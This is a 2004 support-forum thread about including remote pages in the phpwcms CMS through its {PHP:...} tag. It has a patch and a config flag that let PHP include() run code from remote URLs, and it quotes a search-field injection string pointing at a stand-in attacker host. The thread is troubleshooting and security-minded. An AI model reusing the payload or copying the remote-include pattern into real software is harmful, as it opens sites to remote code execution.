phpwcms Support Forum

The phpwcms support forum will help to find answers to your questions. The small but strong community is here since more than 10 years.
https://forum.phpwcms.org/

{PHP:http://www.mysite.com/index.php?id=1,5,0,0,1}: works?

https://forum.phpwcms.org/viewtopic.php?t=2071

Page 1 of 2

{PHP:http://www.mysite.com/index.php?id=1,5,0,0,1}: works?

Posted: Sat 22. May 2004, 20:10
by sustia
Hi, I have trying to put some inclusion in my home page with {PHP} replacement tag, but seems it doesn't works:

I try this code:

Code: Select all

{PHP:http://www.gabriellagramegna.it/index.php?id=1,5,0,0,1,0}
It's correct or I wrong something?

Posted: Sat 22. May 2004, 20:15
by Oliver Georgi
This does not work anymore because of security problems. But you can use something like this by creating a new php script like "myextpage.php":

<?php
//include remote URL
include ('http://www.gabriellagramegna.it/index.p ... ,5,0,0,1,0');
?>

Then use the replacement tag {PHP:myextpage.php}.

Maybe I should implement a new config var that allows remote URL based on user's choice.

Oliver

Posted: Sat 22. May 2004, 20:22
by sustia
Great, it works :D

Thanks Oliver!

Posted: Sat 22. May 2004, 20:45
by Oliver Georgi
I have patched phpwcms for the new value in conf.inc.php - but test it. It might be unsecure when somebody is able to inject your install via search form field. Please test!!!

The changed source is available within some hours via CVS or change manually:

front.func.inc.php replace this function around line 1071:

Code: Select all

function include_ext_php($inc_file, $t=0) {
	// includes an external PHP script file and returns
	// the result as string from buffered include content
	$ext_php_content = '';
	
	//check if this is a local file
	if(is_file($inc_file)) {
	
		if(!$t) {
			$this_path = str_replace("\\", '/', dirname(realpath($inc_file)));
			$this_path = preg_replace('/\/$/', '', $this_path);
		
			$root_path = str_replace("\\", '/', PHPWCMS_ROOT);
			$root_path = preg_replace('/\/$/', '', $root_path);
			
			if(strpos($this_path, $root_path) === 0) $t = 1;
		}
	} else {
		
		if(!$t) {
			//if remote URL is allowed in conf.inc.php
			if(intval($GLOBALS['phpwcms']['allow_remote_URL'])) $t =1;
		}
		
	}
	
	if($t) {
		ob_start();
		include($inc_file);
		$ext_php_content = ob_get_contents();
		ob_end_clean();
	}
	
	return $ext_php_content;
}
Add the following value to your conf.inc.php:

Code: Select all

$phpwcms["allow_remote_URL"]  = 0; //0 = no remote URL in {PHP:...} replacement tag allowed, 1 = allowed
Oliver

Posted: Sun 23. May 2004, 02:03
by sustia
Hi Oliver, the code works fine.
Oliver Georgi wrote:I have patched phpwcms for the new value in conf.inc.php - but test it. It might be unsecure when somebody is able to inject your install via search form field. Please test!!!
Oliver
You intend to say to put something like this in the search form?

Code: Select all

http://www.gabriellagramegna.it/setup/setup.php
I try to inject this, but nothing happens.
I try too to inject with the absolute path, but there's no problem.

If you intend to say something different please, tell me what :)

Thanks as always.
Angelo

Posted: Sun 23. May 2004, 08:13
by Oliver Georgi
No has nothing to do with this.

There was a security problem when you try to insert something like this in the search field {PHP:http://www.dobad.com/return_injection_code.php}

Oliver

Posted: Sun 23. May 2004, 09:30
by sustia
Well, I'm not a security expert, but I try.

I do a page with this code:

Code: Select all

SELECT * FROM `phpwcms_user` WHERE  usr_login='mylogin'
and save in a page (myinjection.php).

Then, from the search field I try this:

Code: Select all

{PHP:http://www.mysite.com/myinjection.php}
But I'm not sure that this is the right way to try.

Posted: Sun 23. May 2004, 10:31
by Oliver Georgi
It isn't but I will not post a sample here.

But if you use a current release - there isn't the problem anymore.

check what happens if you just use {PHP:jdfjdahfjadh} - after pressing search the search field should filled with "jdfjdahfjadh". If so - no security problem ;-)

Oliver

Posted: Sun 23. May 2004, 11:07
by sustia
Yes I use the current release :)
Oliver Georgi wrote: check what happens if you just use {PHP:jdfjdahfjadh} - after pressing search the search field should filled with "jdfjdahfjadh". If so - no security problem ;-)

Oliver
It's so Oliver :wink:

Posted: Sun 23. May 2004, 19:08
by art777
Oliver Georgi wrote:This does not work anymore because of security problems. But you can use something like this by creating a new php script like "myextpage.php":

<?php
//include remote URL
include ('http://www.gabriellagramegna.it/index.p ... ,5,0,0,1,0');
?>

Then use the replacement tag {PHP:myextpage.php}.

Maybe I should implement a new config var that allows remote URL based on user's choice.

Oliver
This does not work... Maybe I don't this understand... :?

I work:

1. I want have content http://info.cms.to.pl/index.php?id=1,1,0,0,1,0 in left column in "templates".
2. Make file newsy.php (in root - http://info.cms.to.pl/newsy.php )

Code: Select all

<?php 
//include remote URL 
include ('http://info.cms.to.pl/index.php?id=1,1,0,0,1,0'); 
?>
3. In "templates - left" set:

Code: Select all

{NAV_TABLE_SIMPLE}<br><br>
{PHP:newsy.php}
4. and in left column - http://info.cms.to.pl/index.php?id=1,1,0,0,1,0

Code: Select all

Warning: main(http://info.cms.to.pl/index.php?id=1,1,0,0,1,0): failed to open stream: HTTP request failed! D_Fâ&#138;1$[7FZ7F in /home/dealer/main/pkg/cms/info/html/newsy.php on line 3

Warning: main(): Failed opening 'http://info.cms.to.pl/index.php?id=1,1,0,0,1,0' for inclusion (include_path='.:/usr/lib/php') in /home/dealer/main/pkg/cms/info/html/newsy.php on line 3
And in conf.inc.php I added:

Code: Select all

$phpwcms["allow_remote_URL"]  = 1; //0 = no remote URL in {PHP:...} replacement tag allowed, 1 = allowed

What I work wrong :cry: (phpwcms_1.1-RC4_2004-05-22 - new install)

Posted: Sun 23. May 2004, 19:14
by Oliver Georgi
1. you have to extend the function for including external php files as posted above
2. if you set allow_remote_URL it is enough to use {PHP:http://info.cms.to.pl/index.php?id=1,1,0,0,1,0}

Oliver

Posted: Sun 23. May 2004, 19:27
by art777
I change

Code: Select all

{NAV_TABLE_SIMPLE}<br><br>
{PHP:newsy.php}
to:

Code: Select all

{NAV_TABLE_SIMPLE}<br><br>
{PHP:http://info.cms.to.pl/index.php?id=1,1,0,0,1,0}
in conf.inc.php still is:

Code: Select all

$phpwcms["allow_remote_URL"]  = 1;
and on site is blank (left column) - http://info.cms.to.pl/index.php?id=1,0,0,1,0,0
:(

Posted: Sun 23. May 2004, 20:07
by Oliver Georgi
But did you do this:
http://www.phpwcms.de/forum/viewtopic.php?p=12808#12808

For me - it works - but it's false to include content this way because you will get double <body> and so on...

Oliver

Posted: Sun 23. May 2004, 21:49
by art777
How to any other way insert any content (from phpwcms) into template (not to {CONTENT} )??

Posted: Sun 23. May 2004, 22:03
by Oliver Georgi
It's in preparation. But not easy possible at the moment. There was a hack for this somewhere in this forum.

Oliver
All times are UTC+02:00
Page 1 of 2

Powered by phpBB® Forum Software © phpBB Limited